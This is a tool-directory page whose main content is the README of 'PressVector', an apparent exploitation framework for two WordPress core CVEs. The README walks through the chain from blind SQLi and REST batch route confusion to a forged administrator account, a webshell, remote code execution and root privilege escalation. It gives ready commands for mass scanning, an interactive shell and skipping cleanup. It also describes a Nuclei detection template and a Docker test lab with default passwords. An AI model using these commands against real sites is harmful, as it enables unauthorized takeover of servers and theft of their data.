Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PressVector — PressVector - Advanced WordPress Vulnerability Scanner CVE-2026-63030 (REST batch route confusion) / CVE-2026-60137 (SQLi) Developer: Vulnquest | Kitploit
أدوات/GitHubGitHub/vulnquest58/pressvector
ReconnaissanceVulnerability ScannersWeb Vulnerability ScannersInformation GatheringWeb SecurityPenetration Testing
GitHubvulnquest58/pressvector

PressVector

PressVector - Advanced WordPress Vulnerability Scanner CVE-2026-63030 (REST batch route confusion) / CVE-2026-60137 (SQLi) Developer: Vulnquest

عرض المستودع
1122منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
المحتوى غير متوفر باللغة المطلوبة. عرض النسخة الإنجليزية.

🧨 PressVector — WordPress CVE-2026-63030 / CVE-2026-60137 Exploitation Framework

⚡ Advanced Pre-Auth RCE & Blind SQLi Exploitation Framework for WordPress Core


📌 Overview

PressVector is a comprehensive, fully automated exploitation framework targeting CVE-2026-63030 and CVE-2026-60137 — two critical vulnerabilities in WordPress core that together allow unauthenticated remote code execution.

The framework chains REST Batch Route Confusion with a blind SQL injection to forge administrator sessions, deploy webshells, and execute arbitrary OS commands — all without any credentials.

⚠️ For authorized security testing and educational purposes only.


🔍 What is CVE-2026-63030 (wp2shell)?

CVE-2026-63030 is a critical pre-authentication RCE vulnerability in WordPress core, discovered by Adam Kues (Assetnote / Searchlight Cyber). The exploit chains two independent vulnerabilities:

CVEAdvisoryTypeImpact
CVE-2026-63030GHSA-ff9f-jf42-662qREST Batch Route ConfusionPre-Auth RCE
CVE-2026-60137GHSA-fpp7-x2x2-2mjfauthor__not_in SQL InjectionPre-Auth Blind SQLi

💥 Exploitation Chain

[Unauthenticated Attacker]
        │
        ▼
[1] REST Batch Route Confusion (/batch/v1)
        │  Bypass auth context — treat batch as internal
        ▼
[2] Blind SQLi via author__not_in parameter
        │  Time-based binary search extraction
        ▼
[3] Extract table prefix + admin user ID
        │
        ▼
[4] Forge admin user via UNION-based injection
        │  Insert into wp_users + wp_usermeta
        ▼
[5] Authenticate & Upload webshell via Media API
        │
        ▼
[6] Remote Code Execution 🎯

📊 Affected Versions

WordPress VersionCVEs ApplicableImpactStatus
6.8.0 – 6.8.5CVE-2026-60137🟡 Blind SQLi (High)❌ Vulnerable
6.9.0 – 6.9.4CVE-2026-63030 + CVE-2026-60137🔴 Pre-Auth RCE (Critical)❌ Vulnerable
7.0.0 – 7.0.1CVE-2026-63030 + CVE-2026-60137🔴 Pre-Auth RCE (Critical)❌ Vulnerable
7.1-alpha / 7.1-beta1CVE-2026-60137🟡 SQLi (High)❌ Vulnerable
6.8.6+ / 6.9.5+ / 7.0.2+—✅ Patched✅ Safe

📦 Installation

# Clone the repository
git clone https://github.com/vulnquest58/PressVector.git
cd PressVector

# No external dependencies required!
# Uses Python standard library only — Python 3.7+ required
python pressvector.py --help

🛠️ Tools Included

1️⃣ pressvector.py — Main Exploitation Framework

Full-featured exploitation framework with 4 modes of operation.

🔎 scan — Multi-target Vulnerability Scanner

Fast, multi-threaded scanner to detect vulnerable WordPress installations at scale.

# Scan multiple targets from CLI
python pressvector.py scan http://target1.com http://target2.com

# Scan from a file list (10 threads)
python pressvector.py scan -f targets.txt -t 10

# Output as JSON
python pressvector.py scan -f targets.txt -t 10 --json

✅ check — Blind SQLi Confirmation

Confirm time-based blind SQL injection on a single target with timing calibration.

# Check a single target
python pressvector.py check http://target.com

# Custom delay and repeats for accuracy
python pressvector.py check http://target.com --delay 3.0 --repeats 5

💥 exploit — Full RCE Exploitation Chain

Complete exploitation: forge admin → deploy webshell → execute commands.

# Execute a single command
python pressvector.py exploit http://target.com -c "id"

# Interactive shell (full TTY-like experience)
python pressvector.py exploit http://target.com -i

# Through a proxy (Burp Suite / MITM)
python pressvector.py exploit http://target.com -i --proxy http://127.0.0.1:8080

# Don't clean up artifacts after exploitation
python pressvector.py exploit http://target.com -c "whoami" --no-cleanup

🔺 privesc — Privilege Escalation

Attempt local privilege escalation after achieving RCE.

# Run privesc and get interactive root shell
python pressvector.py privesc http://target.com -i

# Run privesc without cleanup
python pressvector.py privesc http://target.com --no-cleanup

2️⃣ pressvector-wp2shell-detection.yaml — Nuclei Detection Template

A production-ready Nuclei template for large-scale passive detection.

# Run with Nuclei
nuclei -t pressvector-wp2shell-detection.yaml -u http://target.com

# Bulk scan
nuclei -t pressvector-wp2shell-detection.yaml -l targets.txt -o results.txt

# With rate limiting
nuclei -t pressvector-wp2shell-detection.yaml -l targets.txt -rl 50

Template features:

  • 🔍 Multi-source version detection (meta generator + RSS feed fallback)
  • 📡 REST API namespace fingerprinting
  • 🎯 Batch route accessibility probing
  • 📋 Dynamic output: version, CVE type, attack vector

🧪 Lab Environment (Docker)

A fully automated, containerized penetration testing lab is included for safe, isolated testing of these vulnerabilities.

Quick Start

Windows (PowerShell):

cd pressvector-lab
.\start-lab.ps1

Linux / macOS:

cd pressvector-lab
chmod +x start-lab.sh && ./start-lab.sh

(Wait ~60-90 seconds on first run for the WP-CLI installer to set up all WordPress sites automatically).

Lab Services & Ports

PortServiceWordPress VersionVulnerability / Status
8080Target 16.8.5CVE-2026-60137 (Blind SQLi only) 🔴
8081Target 26.9.4CVE-2026-63030 (Pre-Auth RCE) 🔴
8082Target 37.0.1CVE-2026-63030 (Pre-Auth RCE) 🔴
8083ReferenceLatestPatched / Safe Reference ✅
8084PHPMyAdmin—DB Management Tool
8085Lab Dashboard—Web UI with target status & copyable commands 🖥️

Admin Credentials: admin / admin123
MySQL Root Password: root

Verification & Automated Testing

You can verify the entire lab state and exploitation paths using the automated test suite:

# Run SQLi & RCE automated tests
python pressvector-lab/tests/run_all_tests.py

Lab Control Commands

  • Stop lab (keep data): Run stop-lab.sh or .\stop-lab.ps1
  • Reset lab (wipe data & clean build): Run reset-lab.sh or .\reset-lab.ps1

For more advanced instructions and troubleshooting, see the Lab README.


🏗️ Architecture

تنزيل الأداة